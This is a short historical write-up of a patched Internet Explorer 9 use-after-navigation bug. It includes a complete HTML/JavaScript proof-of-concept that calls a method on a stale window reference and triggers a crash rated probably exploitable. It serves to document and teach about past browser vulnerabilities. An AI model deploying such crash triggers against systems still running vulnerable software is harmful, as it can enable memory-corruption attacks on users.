IE9 EoP: Execute Window Method After Page Has Gone (Variant)

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

This is a close variant of the same timing-based crash described in the earlier entry on the same date. The mechanism is identical: save a reference to window, navigate away, open a dialog to buy time, then call a method on the stale reference inside a try/catch. This copy was preserved separately in the archive, likely as a parallel documentation effort for the same underlying bug.

<!-- iframe.html (loaded inside the iFrame) -->
<script>
function crashMe()
{
    pWindow = window;
    location.href = "about:blank";
    window.print();
    try
    {
        pWindow.showModalDialog();
    }
    catch (e){}
}
</script>
<input type="button" onmouseover="crashMe()" value="mouseOver me to Crash!">

<!-- parent page -->
<iframe src="iframe.html" name="iFrame" width="400" height="80"></iframe>

The try/catch wrapper is what distinguishes the exploitable path from a benign exception. Without it, the engine recovers gracefully. With it, the exception propagation attempts to marshal the thrown object across the now-invalid script context, hitting the null pointer in ScriptSite::CheckCrossDomainScriptContext. The crash was rated PROBABLY_EXPLOITABLE.